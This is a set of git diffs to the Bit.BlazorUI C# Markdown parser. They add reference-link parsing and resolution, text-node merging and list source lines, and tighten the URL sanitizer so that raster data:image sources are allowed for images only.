+            RawSuffix = suffix
+        };
+        node.Children.AddRange(isImage ? state.ParseInlines(label) : RemoveNestedLinks(state.ParseInlines(label)));
+
+        state.AppendNode(node);
+        state.Pos = end + 1;
+        return true;
+    }
+
+    private static void Emit(BitMarkdownInlineProcessor state, string label, bool isImage, string url, string? title)
+    {
         if (isImage)
         {
             state.AppendNode(new BitMarkdownImageNode
@@ -35,21 +111,18 @@ public sealed class BitMarkdownLinkInlineParser : BitMarkdownInlineParser
                 Title = title,
                 Alt = BitMarkdownInlineHelpers.PlainText(state.ParseInlines(label))
             });
+            return;
         }
-        else
+
+        var link = new BitMarkdownLinkNode
         {
-            var link = new BitMarkdownLinkNode
-            {
-                Url = BitMarkdownUrlSanitizer.Sanitize(url, isImage: false),
-                Title = title
-            };
-            // A link may not contain another link; unwrap any nested links so the
-            // inner link's content survives as plain inline text instead.
-            link.Children.AddRange(RemoveNestedLinks(state.ParseInlines(label)));
-            state.AppendNode(link);
-        }
-        state.Pos = q + 1;
-        return true;
+            Url = BitMarkdownUrlSanitizer.Sanitize(url, isImage: false),
+            Title = title
+        };
+        // A link may not contain another link; unwrap any nested links so the
+        // inner link's content survives as plain inline text instead.
+        link.Children.AddRange(RemoveNestedLinks(state.ParseInlines(label)));
+        state.AppendNode(link);
     }
 
     // Recursively replaces any nested link node with its (also unwrapped) children,
@@ -73,56 +146,6 @@ public sealed class BitMarkdownLinkInlineParser : BitMarkdownInlineParser
             result.Add(node);
         }
         return result;
-    }
-
-    private static int FindLabelEnd(string s, int openBracket)
-    {
-        int depth = 0;
-        int i = openBracket;
-        while (i < s.Length)
-        {
-            char c = s[i];
-            if (c == '\\') { i += 2; continue; }
-            if (c == '`')
-            {
-                // Skip an inline code span so that ']' enclosed by backticks does
-                // not prematurely terminate the link label.
-                i = SkipCodeSpan(s, i);
-                continue;
-            }
-            if (c == '[') depth++;
-            else if (c == ']')
-            {
-                depth--;
-                if (depth == 0) return i;
-            }
-            i++;
-        }
-        return -1;
-    }
-
-    // Given the index of a backtick, returns the index just past a matching
-    // closing code-span run. If no closing run of equal length exists, the
-    // backticks are treated as literal text and the index just past the opening
-    // run is returned.
-    private static int SkipCodeSpan(string s, int i)
-    {
-        int start = i;
-        int openLen = 0;
-        while (i < s.Length && s[i] == '`') { i++; openLen++; }
-
-        int j = i;
-        while (j < s.Length)
-        {
-            if (s[j] == '`')
-            {
-                int closeLen = 0;
-                while (j < s.Length && s[j] == '`') { j++; closeLen++; }
-                if (closeLen == openLen) return j;
-            }
-            else j++;
-        }
-        return start + openLen;
     }
 
     private static bool ParseDestination(string s, ref int i, out string url, out string? title)
@@ -173,7 +196,7 @@ public sealed class BitMarkdownLinkInlineParser : BitMarkdownInlineParser
             }
             if (i >= n) return false;
             i++;
-            title = tb.ToString();
+            title = BitMarkdownEntities.Decode(tb.ToString());
             while (i < n && (s[i] is ' ' or '\t' or '\n')) i++;
         }
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkReferenceAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkReferenceAstProcessor.cs
@@ -1,0 +1,121 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Completes reference links and images once the whole document is known. It collects every
+/// <see cref="BitMarkdownLinkReferenceDefinitionNode"/> (removing it from the rendered tree),
+/// then rewrites each <see cref="BitMarkdownLinkReferenceNode"/> into a real link or image -
+/// or back into the literal text it was written as, when no definition matches.
+/// </summary>
+public sealed class BitMarkdownLinkReferenceAstProcessor : BitMarkdownAstProcessor
+{
+    // Runs before every extension processor, so the flavors (task lists, autolinks, emoji,
+    // auto identifiers) see a tree with no unresolved references left in it.
+    public override int Order => 0;
+
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        // Definitions are document-scoped wherever they were written, so they are collected
+        // from the whole tree before anything is resolved; a definition is allowed to sit
+        // after the reference that uses it. The first definition of a label wins.
+        var definitions = new Dictionary<string, BitMarkdownLinkReferenceDefinitionNode>(StringComparer.Ordinal);
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            // Collected in document order so the first definition of a label wins, then
+            // removed back to front so the indexes stay valid.
+            for (int i = 0; i < list.Count; i++)
+            {
+                if (list[i] is BitMarkdownLinkReferenceDefinitionNode def)
+                    definitions.TryAdd(def.NormalizedLabel, def);
+            }
+
+            for (int i = list.Count - 1; i >= 0; i--)
+            {
+                if (list[i] is BitMarkdownLinkReferenceDefinitionNode) list.RemoveAt(i);
+            }
+        });
+
+        // Always run: a reference node can outlive its definition (a "[a]:" line the
+        // pre-scan saw inside a code block, say), and it has to read as text either way.
+        // The walk is a no-op for the documents - the overwhelming majority - that hold none.
+        BitMarkdownAstHelper.VisitChildLists(document, list => Resolve(list, definitions));
+
+        if (definitions.Count == 0) return;
+
+        // A reference nested inside another reference's label resolves after its host, which
+        // would leave an <a> inside an <a>. Flattening once at the end guarantees a link's
+        // content is never itself a link.
+        foreach (var link in BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownLinkNode>())
+        {
+            Unnest(link.Children);
+        }
+    }
+
+    // Replaces every link in the collection (at any depth) with its own children.
+    private static void Unnest(IList<BitMarkdownNode> children)
+    {
+        for (int i = 0; i < children.Count; i++)
+        {
+            if (children[i] is not BitMarkdownLinkNode nested)
+            {
+                foreach (var list in children[i].ChildLists) Unnest(list);
+                continue;
+            }
+
+            children.RemoveAt(i);
+            int at = i;
+            foreach (var child in nested.Children) children.Insert(at++, child);
+            // Deliberately not advancing: the spliced-in content may hold links of its own.
+            i--;
+        }
+    }
+
+    private static void Resolve(IList<BitMarkdownNode> list, Dictionary<string, BitMarkdownLinkReferenceDefinitionNode> definitions)
+    {
+        int i = 0;
+        while (i < list.Count)
+        {
+            if (list[i] is not BitMarkdownLinkReferenceNode reference)
+            {
+                i++;
+                continue;
+            }
+
+            if (definitions.TryGetValue(reference.Label, out var definition))
+            {
+                list[i] = Build(reference, definition);
+                i++;
+                continue;
+            }
+
+            // No such definition: put the source text back, so "[not a link]" reads exactly
+            // as it was written and a task marker like "[ ]" survives for the task-list
+            // processor once the neighbouring text runs are merged again below.
+            list.RemoveAt(i);
+            int at = i;
+            list.Insert(at++, new BitMarkdownTextNode(reference.RawPrefix));
+            foreach (var child in reference.Children) list.Insert(at++, child);
+            list.Insert(at, new BitMarkdownTextNode(reference.RawSuffix));
+            // Deliberately not advancing: the spliced-in children may themselves hold
+            // references that this pass has not visited yet.
+        }
+    }
+
+    private static BitMarkdownNode Build(BitMarkdownLinkReferenceNode reference, BitMarkdownLinkReferenceDefinitionNode definition)
+    {
+        if (reference.IsImage)
+        {
+            return new BitMarkdownImageNode
+            {
+                // The definition's destination was sanitized as a link; an image is only
+                // allowed a narrower set of schemes, so it is sanitized again here.
+                Url = BitMarkdownUrlSanitizer.Sanitize(definition.Url, isImage: true),
+                Title = definition.Title,
+                Alt = BitMarkdownInlineHelpers.PlainText(reference.Children)
+            };
+        }
+
+        var link = new BitMarkdownLinkNode { Url = definition.Url, Title = definition.Title };
+        link.Children.AddRange(reference.Children);
+        return link;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkReferenceAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkReferenceAstProcessor.cs
@@ -106,9 +106,11 @@ public sealed class BitMarkdownLinkReferenceAstProcessor : BitMarkdownAstProcess
         {
             return new BitMarkdownImageNode
             {
-                // The definition's destination was sanitized as a link; an image is only
-                // allowed a narrower set of schemes, so it is sanitized again here.
-                Url = BitMarkdownUrlSanitizer.Sanitize(definition.Url, isImage: true),
+                // Sanitized from the destination as written, not from the link-sanitized one: the
+                // two sets of allowed schemes overlap but neither contains the other, so an
+                // embedded "data:image/png" - a valid image source, never a valid link - would
+                // already have been blanked by the first pass.
+                Url = BitMarkdownUrlSanitizer.Sanitize(definition.RawUrl, isImage: true),
                 Title = definition.Title,
                 Alt = BitMarkdownInlineHelpers.PlainText(reference.Children)
             };

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkReferenceDefinitionParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkReferenceDefinitionParser.cs
@@ -96,11 +96,13 @@ public sealed class BitMarkdownLinkReferenceDefinitionParser : BitMarkdownBlockP
             }
         }
 
+        string decoded = BitMarkdownEntities.Decode(url);
         definition = new BitMarkdownLinkReferenceDefinitionNode
         {
             Label = label,
             NormalizedLabel = normalized,
-            Url = BitMarkdownUrlSanitizer.Sanitize(BitMarkdownEntities.Decode(url), isImage: false),
+            Url = BitMarkdownUrlSanitizer.Sanitize(decoded, isImage: false),
+            RawUrl = decoded,
             Title = title
         };
         index += consumed;

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkReferenceDefinitionParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownLinkReferenceDefinitionParser.cs
@@ -1,0 +1,176 @@
+using System.Text;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Parses link reference definitions (<c>[label]: /url "optional title"</c>). A definition
+/// produces no output of its own; it declares a label that reference links and images
+/// elsewhere in the document resolve against.
+/// </summary>
+public sealed class BitMarkdownLinkReferenceDefinitionParser : BitMarkdownBlockParser
+{
+    // Definitions are recognized before every other construct except the fenced code and
+    // footnote parsers, which claim their lines first.
+    public override int Order => 5;
+
+    public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
+    {
+        var lines = state.Lines;
+        int i = state.Line;
+
+        // A run of consecutive definitions is consumed in one go, so "[a]: /a" followed by
+        // "[b]: /b" does not leave the second one stranded as paragraph text.
+        bool any = false;
+        while (i < lines.Count && TryParseOne(lines, ref i, out var definition))
+        {
+            output.Add(definition!);
+            any = true;
+        }
+
+        if (any is false) return false;
+
+        state.Line = i;
+        return true;
+    }
+
+    // A definition never interrupts an open paragraph (CommonMark); leaving
+    // CanInterruptParagraph at its default false is what keeps that true.
+
+    private static bool TryParseOne(IReadOnlyList<string> lines, ref int index, out BitMarkdownLinkReferenceDefinitionNode? definition)
+    {
+        definition = null;
+
+        string line = lines[index];
+        // Four spaces of indentation makes it an indented code block, not a definition.
+        if (BitMarkdownBlockProcessor.GetIndent(line) >= 4) return false;
+
+        int p = 0;
+        while (p < line.Length && line[p] == ' ') p++;
+        if (p >= line.Length || line[p] != '[') return false;
+
+        int labelEnd = BitMarkdownLinkHelpers.FindLabelEnd(line, p);
+        if (labelEnd < 0) return false;
+        if (labelEnd + 1 >= line.Length || line[labelEnd + 1] != ':') return false;
+
+        string label = line.Substring(p + 1, labelEnd - p - 1);
+        // An all-whitespace label matches nothing and is not a definition.
+        if (label.Length is 0 or > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+        string normalized = BitMarkdownLinkHelpers.NormalizeLabel(label);
+        if (normalized.Length == 0) return false;
+
+        int q = labelEnd + 2;
+        while (q < line.Length && (line[q] is ' ' or '\t')) q++;
+        if (TryReadDestination(line, ref q, out string url) is false) return false;
+
+        int consumed = 1;
+        string? title = null;
+
+        int afterUrl = q;
+        while (q < line.Length && (line[q] is ' ' or '\t')) q++;
+
+        if (q < line.Length)
+        {
+            // A title on the definition's own line must be separated from the destination
+            // and must be the last thing on that line.
+            if (q == afterUrl) return false;
+            if (TryReadTitle(line, ref q, out title) is false) return false;
+            while (q < line.Length && (line[q] is ' ' or '\t')) q++;
+            if (q < line.Length) return false;
+        }
+        else if (index + 1 < lines.Count)
+        {
+            // CommonMark allows the title to sit on the line following the destination.
+            // If that line is not a valid, complete title the definition still stands and
+            // the line is left for the next parser.
+            string next = lines[index + 1];
+            int t = 0;
+            while (t < next.Length && (next[t] is ' ' or '\t')) t++;
+            if (t < next.Length && TryReadTitle(next, ref t, out var nextTitle))
+            {
+                while (t < next.Length && (next[t] is ' ' or '\t')) t++;
+                if (t == next.Length)
+                {
+                    title = nextTitle;
+                    consumed = 2;
+                }
+            }
+        }
+
+        definition = new BitMarkdownLinkReferenceDefinitionNode
+        {
+            Label = label,
+            NormalizedLabel = normalized,
+            Url = BitMarkdownUrlSanitizer.Sanitize(BitMarkdownEntities.Decode(url), isImage: false),
+            Title = title
+        };
+        index += consumed;
+        return true;
+    }
+
+    // Reads a link destination: either <bracketed> or a bare run with balanced parentheses.
+    private static bool TryReadDestination(string line, ref int i, out string url)
+    {
+        url = string.Empty;
+        if (i >= line.Length) return false;
+
+        var sb = new StringBuilder();
+        if (line[i] == '<')
+        {
+            i++;
+            while (i < line.Length && line[i] != '>')
+            {
+                if (line[i] == '<') return false;
+                if (line[i] == '\\' && i + 1 < line.Length) { sb.Append(line[i + 1]); i += 2; continue; }
+                sb.Append(line[i++]);
+            }
+            if (i >= line.Length) return false;
+            i++;
+            url = sb.ToString();
+            // "[a]: <>" is a valid definition pointing at an empty destination.
+            return true;
+        }
+
+        int depth = 0;
+        while (i < line.Length)
+        {
+            char c = line[i];
+            if (c is ' ' or '\t') break;
+            if (c == '\\' && i + 1 < line.Length) { sb.Append(line[i + 1]); i += 2; continue; }
+            if (c == '(') depth++;
+            else if (c == ')')
+            {
+                if (depth == 0) return false;
+                depth--;
+            }
+            sb.Append(c);
+            i++;
+        }
+
+        url = sb.ToString();
+        return url.Length > 0;
+    }
+
+    // Reads a "title", 'title' or (title) that must be closed on the same line.
+    private static bool TryReadTitle(string line, ref int i, out string? title)
+    {
+        title = null;
+        if (i >= line.Length) return false;
+
+        char open = line[i];
+        if (open is not ('"' or '\'' or '(')) return false;
+        char close = open == '(' ? ')' : open;
+
+        var sb = new StringBuilder();
+        int j = i + 1;
+        while (j < line.Length && line[j] != close)
+        {
+            if (line[j] == '\\' && j + 1 < line.Length) { sb.Append(line[j + 1]); j += 2; continue; }
+            sb.Append(line[j++]);
+        }
+        if (j >= line.Length) return false;
+
+        title = BitMarkdownEntities.Decode(sb.ToString());
+        i = j + 1;
+        return true;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownListParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownListParser.cs
@@ -82,6 +82,7 @@ public sealed class BitMarkdownListParser : BitMarkdownBlockParser
             }
 
             var itemLines = new List<string> { firstContent };
+            int markerLine = i;
             i++;
 
             bool itemHadBlank = false;
@@ -131,8 +132,14 @@ public sealed class BitMarkdownListParser : BitMarkdownBlockParser
                 break;
             }
 
-            var item = new BitMarkdownListItemNode { Source = firstContent };
-            item.Children.AddRange(state.ParseBlocks(itemLines));
+            var item = new BitMarkdownListItemNode
+            {
+                Source = firstContent,
+                SourceLine = state.SourceLine(markerLine)
+            };
+            // The item's lines were gathered one for one from the marker line on, blank
+            // separators included, so they map straight onto the document's own lines.
+            item.Children.AddRange(state.ParseBlocks(itemLines, markerLine));
             if (itemHadBlank) loose = true;
             list.Items.Add(item);
         }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownTextMergeAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownTextMergeAstProcessor.cs
@@ -1,3 +1,5 @@
+using System.Text;
+
 namespace Bit.BlazorUI;
 
 /// <summary>
@@ -25,13 +27,22 @@ public sealed class BitMarkdownTextMergeAstProcessor : BitMarkdownAstProcessor
     {
         BitMarkdownAstHelper.VisitChildLists(document, list =>
         {
-            for (int i = list.Count - 1; i > 0; i--)
+            for (int i = 0; i < list.Count; i++)
             {
-                if (list[i] is BitMarkdownTextNode current && list[i - 1] is BitMarkdownTextNode previous)
-                {
-                    previous.Text += current.Text;
-                    list.RemoveAt(i);
-                }
+                if (list[i] is not BitMarkdownTextNode first) continue;
+
+                int end = i + 1;
+                while (end < list.Count && list[end] is BitMarkdownTextNode) end++;
+                if (end == i + 1) continue;
+
+                // The whole run is joined in one pass: appending each node to the one before it
+                // would copy the text already merged again for every node, which a long run of
+                // unpaired delimiters turns into quadratic work.
+                var text = new StringBuilder(first.Text);
+                for (int j = i + 1; j < end; j++) text.Append(((BitMarkdownTextNode)list[j]).Text);
+                first.Text = text.ToString();
+
+                for (int j = end - 1; j > i; j--) list.RemoveAt(j);
             }
         });
     }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownTextMergeAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownTextMergeAstProcessor.cs
@@ -1,0 +1,38 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Merges every run of adjacent text nodes into one.
+/// </summary>
+/// <remarks>
+/// <para>
+/// The inline scanner emits a separate token for each delimiter run it collects, and a run
+/// that never pairs up is turned back into text - so a single piece of prose can reach the
+/// AST as several text nodes. That is invisible in the rendered HTML, but it is not
+/// invisible to the AST processors that read text: an autolink literal like
+/// <c>https://example.com/a_(b)</c> arrives split around the <c>_</c> and only its first
+/// fragment gets linked, and a task marker split around its brackets stops looking like one.
+/// </para>
+/// <para>
+/// Running this first gives every later processor the text the author actually wrote.
+/// </para>
+/// </remarks>
+public sealed class BitMarkdownTextMergeAstProcessor : BitMarkdownAstProcessor
+{
+    // After link references are resolved (0), before any flavor.
+    public override int Order => 1;
+
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            for (int i = list.Count - 1; i > 0; i--)
+            {
+                if (list[i] is BitMarkdownTextNode current && list[i - 1] is BitMarkdownTextNode previous)
+                {
+                    previous.Text += current.Text;
+                    list.RemoveAt(i);
+                }
+            }
+        });
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownUrlSanitizer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownUrlSanitizer.cs
@@ -20,6 +20,16 @@ internal static partial class BitMarkdownUrlSanitizer
     private static readonly string[] AllowedImageSchemes =
         { "http:", "https:" };
 
+    // Inline image payloads that a browser only ever decodes as a bitmap. "image/svg+xml"
+    // is deliberately absent: an SVG document can carry script, and although a browser does
+    // not run it through <img>, allowing it would make the sanitizer's guarantee depend on
+    // where the URL is used. Everything here is a raster format with no scripting model.
+    private static readonly string[] AllowedImageDataTypes =
+    {
+        "data:image/png", "data:image/jpeg", "data:image/jpg", "data:image/gif",
+        "data:image/webp", "data:image/avif", "data:image/bmp", "data:image/x-icon"
+    };
+
     public static string Sanitize(string url, bool isImage)
     {
         if (string.IsNullOrWhiteSpace(url))
@@ -41,18 +51,18 @@ internal static partial class BitMarkdownUrlSanitizer
             trimmed.StartsWith("./") || trimmed.StartsWith("../") ||
             trimmed.StartsWith("//"))
         {
-            return trimmed;
+            return EncodeSpaces(trimmed);
         }
 
         // Only treat the text before the first ':' as a scheme if it appears
         // before any '/', '?' or '#'. Otherwise it's a relative path.
         int colon = trimmed.IndexOf(':');
         if (colon < 0)
-            return trimmed; // no scheme => relative
+            return EncodeSpaces(trimmed); // no scheme => relative
 
         int slash = trimmed.IndexOfAny(new[] { '/', '?', '#' });
         if (slash >= 0 && slash < colon)
-            return trimmed; // ':' belongs to the path, not a scheme
+            return EncodeSpaces(trimmed); // ':' belongs to the path, not a scheme
 
         // Compare scheme case-insensitively, ignoring embedded control chars.
         // Browsers normalize away all ASCII C0 control characters (0x00-0x1F) and
@@ -65,10 +75,36 @@ internal static partial class BitMarkdownUrlSanitizer
         foreach (var s in allowed)
         {
             if (scheme == s)
-                return trimmed;
+                return EncodeSpaces(trimmed);
         }
+
+        // Embedded raster images are a normal way to ship a self-contained document, so a
+        // "data:image/png;base64,..." source is allowed for images (never for links, where
+        // navigating to a data: URL is a known phishing vector).
+        if (isImage && IsAllowedImageData(trimmed))
+            return trimmed;
 
         // Unknown/blocked scheme.
         return string.Empty;
+    }
+
+    // A literal space is never valid in a URL - "[a](</my url>)" is written with one only
+    // because the angle brackets let it be. Percent-encoding it keeps the attribute well
+    // formed; every other character is left exactly as the author wrote it, so an already
+    // encoded URL is never encoded twice.
+    private static string EncodeSpaces(string url)
+        => url.IndexOf(' ') < 0 ? url : url.Replace(" ", "%20");
+
+    // Matches "data:<raster media type>" followed by the ';' or ',' that ends the type, so
+    // "data:image/pngx" or a type with a trailing suffix cannot slip through on a prefix.
+    private static bool IsAllowedImageData(string url)
+    {
+        foreach (var prefix in AllowedImageDataTypes)
+        {
+            if (url.Length <= prefix.Length) continue;
+            if (url.StartsWith(prefix, StringComparison.OrdinalIgnoreCase) is false) continue;
+            if (url[prefix.Length] is ';' or ',') return true;
+        }
+        return false;
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownParseContext.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownParseContext.cs
@@ -1,0 +1,34 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// The per-parse state shared by every block and inline parser taking part in a single
+/// <see cref="BitMarkdownPipeline.Parse(string?)"/> call. It carries the safety limits
+/// in effect plus the set of reference labels discovered by the pre-scan, so an inline
+/// parser can tell a real reference (<c>[text][ref]</c>, <c>[^1]</c>) from ordinary
+/// bracketed prose before the definitions themselves have been parsed.
+/// </summary>
+internal sealed class BitMarkdownParseContext
+{
+    public BitMarkdownParseContext(BitMarkdownParseOptions options, IReadOnlySet<string> referenceLabels)
+    {
+        Options = options;
+        ReferenceLabels = referenceLabels;
+    }
+
+    /// <summary>The safety limits in effect for this parse.</summary>
+    public BitMarkdownParseOptions Options { get; }
+
+    /// <summary>
+    /// The normalized labels of every <c>[label]:</c> definition line found anywhere in the
+    /// source. Definitions may appear after the references that use them, so this cheap
+    /// pre-scan is what lets the inline parsers decide - while scanning - whether a pair of
+    /// brackets can possibly be a reference at all. When a document declares no definitions
+    /// the set is empty and bracketed text is scanned exactly as it was before references
+    /// were supported.
+    /// </summary>
+    public IReadOnlySet<string> ReferenceLabels { get; }
+
+    /// <summary>An empty context carrying the default limits, used by the parameterless parse overloads.</summary>
+    public static BitMarkdownParseContext Empty { get; } =
+        new(BitMarkdownParseOptions.Default, new HashSet<string>(StringComparer.Ordinal));
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipeline.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipeline.cs
@@ -43,7 +43,12 @@ public sealed partial class BitMarkdownPipeline
         }
         DelimiterByChar = delimByChar;
         DelimiterChars = new HashSet<char>(delimByChar.Keys);
+
+        Texts = builder.Texts ?? BitMarkdownTexts.Default;
+        _renderer = new BitMarkdownRenderer(Renderers, Texts);
     }
+
+    private readonly BitMarkdownRenderer _renderer;
 
     // Matches a line that opens a link reference definition, a footnote definition, or any
     // other "[label]:" construct. Only the label is captured: the pre-scan exists purely to
@@ -133,8 +138,21 @@ public sealed partial class BitMarkdownPipeline
         return new BitMarkdownInlineProcessor(this, context, depth).Parse(text);
     }
 
+    /// <summary>
+    /// The words this pipeline's renderers write themselves - alert titles, footnote back-links,
+    /// the accessible names of the regions and controls the markup adds.
+    /// </summary>
+    public BitMarkdownTexts Texts { get; }
+
     /// <summary>Creates a renderer bound to this pipeline's node renderers.</summary>
-    public BitMarkdownRenderer CreateRenderer() => new(Renderers);
+    public BitMarkdownRenderer CreateRenderer() => new(Renderers, Texts);
+
+    /// <summary>
+    /// The renderer this pipeline hands its own callers. A renderer holds nothing but the
+    /// pipeline's (immutable) renderer list, so one instance serves every render of every
+    /// component sharing the pipeline instead of being allocated per render.
+    /// </summary>
+    public BitMarkdownRenderer Renderer => _renderer;
 
     private static List<string> SplitLines(string text)
     {

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipeline.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipeline.cs
@@ -1,3 +1,5 @@
+using System.Text.RegularExpressions;
+
 namespace Bit.BlazorUI;
 
 /// <summary>
@@ -5,7 +7,7 @@ namespace Bit.BlazorUI;
 /// <see cref="BitMarkdownPipelineBuilder"/>. Pipelines are thread-safe and should be
 /// cached and shared.
 /// </summary>
-public sealed class BitMarkdownPipeline
+public sealed partial class BitMarkdownPipeline
 {
     internal BitMarkdownPipeline(BitMarkdownPipelineBuilder builder)
     {
@@ -13,9 +15,12 @@ public sealed class BitMarkdownPipeline
         AstProcessors = builder.AstProcessors.OrderBy(p => p.Order).ToArray();
         Renderers = builder.Renderers.ToArray();
 
-        // Map trigger chars -> inline parsers (preserving registration order).
+        // Map trigger chars -> inline parsers. Parsers are ordered by their Order so an
+        // extension can be consulted before a core parser sharing the same trigger (the
+        // footnote parser must see '[' before the link parser does); OrderBy is stable,
+        // so equal orders keep registration order.
         var byChar = new Dictionary<char, List<BitMarkdownInlineParser>>();
-        foreach (var parser in builder.InlineParsers)
+        foreach (var parser in builder.InlineParsers.OrderBy(p => p.Order))
             foreach (var c in parser.TriggerChars)
                 (byChar.TryGetValue(c, out var l) ? l : byChar[c] = new()).Add(parser);
         InlineParsersByChar = byChar.ToDictionary(kv => kv.Key, kv => (IReadOnlyList<BitMarkdownInlineParser>)kv.Value);
@@ -40,6 +45,14 @@ public sealed class BitMarkdownPipeline
         DelimiterChars = new HashSet<char>(delimByChar.Keys);
     }
 
+    // Matches a line that opens a link reference definition, a footnote definition, or any
+    // other "[label]:" construct. Only the label is captured: the pre-scan exists purely to
+    // know which labels a reference could possibly resolve to, never to parse the definition.
+    // The label body excludes unescaped brackets and is bounded by CommonMark's 999-char
+    // ceiling, so the pattern cannot backtrack catastrophically.
+    [GeneratedRegex(@"^ {0,3}\[(?<label>(?:[^\[\]\\\n]|\\.){1,999})\]:", RegexOptions.None, matchTimeoutMilliseconds: 1000)]
+    private static partial Regex ReferenceDefinitionStart();
+
     internal IReadOnlyList<BitMarkdownBlockParser> BlockParsers { get; }
     internal IReadOnlyList<BitMarkdownAstProcessor> AstProcessors { get; }
     internal IReadOnlyList<BitMarkdownNodeRenderer> Renderers { get; }
@@ -57,7 +70,10 @@ public sealed class BitMarkdownPipeline
         if (string.IsNullOrEmpty(markdown))
             return document;
 
-        document.Children.AddRange(ParseBlocks(SplitLines(markdown), options, 0));
+        var lines = SplitLines(markdown);
+        var context = new BitMarkdownParseContext(options, ScanReferenceLabels(lines));
+
+        document.Children.AddRange(ParseBlocks(lines, context, 0));
 
         foreach (var processor in AstProcessors)
             processor.Process(document, this);
@@ -65,27 +81,56 @@ public sealed class BitMarkdownPipeline
         return document;
     }
 
-    internal List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines, BitMarkdownParseOptions options, int depth)
+    // Collects the normalized label of every "[label]:" line in the source. Reference
+    // definitions are allowed to appear after the references that use them, so the inline
+    // parsers cannot know from the text alone whether "[foo]" is a reference or ordinary
+    // prose; consulting this set first keeps documents that declare no definitions parsing
+    // exactly as they did before reference links existed.
+    private static HashSet<string> ScanReferenceLabels(IReadOnlyList<string> lines)
+    {
+        var labels = new HashSet<string>(StringComparer.Ordinal);
+        foreach (var line in lines)
+        {
+            // Cheap rejection first: the vast majority of lines never open a definition.
+            if (line.Length < 4 || line.IndexOf('[') < 0 || line.IndexOf("]:", StringComparison.Ordinal) < 0)
+                continue;
+
+            try
+            {
+                var m = ReferenceDefinitionStart().Match(line);
+                if (m.Success)
+                    labels.Add(BitMarkdownLinkHelpers.NormalizeLabel(m.Groups["label"].Value));
+            }
+            catch (RegexMatchTimeoutException)
+            {
+                // Pathological line: skip it rather than hang. A missed label only means
+                // the corresponding reference degrades to literal text.
+            }
+        }
+        return labels;
+    }
+
+    internal List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines, BitMarkdownParseContext context, int depth)
     {
         // Depth guard: stop recursing into ever-deeper nested blocks and instead keep
         // the remaining lines as a single plain-text paragraph. This caps recursion so
         // hostile input (e.g. ">>>>...") cannot trigger a StackOverflowException.
-        if (depth > options.MaxDepth)
+        if (depth > context.Options.MaxDepth)
         {
             var para = new BitMarkdownParagraphNode();
             para.Inlines.Add(new BitMarkdownTextNode(string.Join("\n", lines)));
             return new List<BitMarkdownNode> { para };
         }
 
-        return new BitMarkdownBlockProcessor(this, lines, options, depth).Run();
+        return new BitMarkdownBlockProcessor(this, lines, context, depth).Run();
     }
 
-    internal List<BitMarkdownNode> ParseInlines(string text, BitMarkdownParseOptions options, int depth)
+    internal List<BitMarkdownNode> ParseInlines(string text, BitMarkdownParseContext context, int depth)
     {
-        if (depth > options.MaxDepth)
+        if (depth > context.Options.MaxDepth)
             return new List<BitMarkdownNode> { new BitMarkdownTextNode(text) };
 
-        return new BitMarkdownInlineProcessor(this, options, depth).Parse(text);
+        return new BitMarkdownInlineProcessor(this, context, depth).Parse(text);
     }
 
     /// <summary>Creates a renderer bound to this pipeline's node renderers.</summary>

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipeline.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Pipeline/BitMarkdownPipeline.cs
@@ -1,4 +1,4 @@
-using System.Text.RegularExpressions;
+﻿using System.Text.RegularExpressions;
 
 namespace Bit.BlazorUI;
 
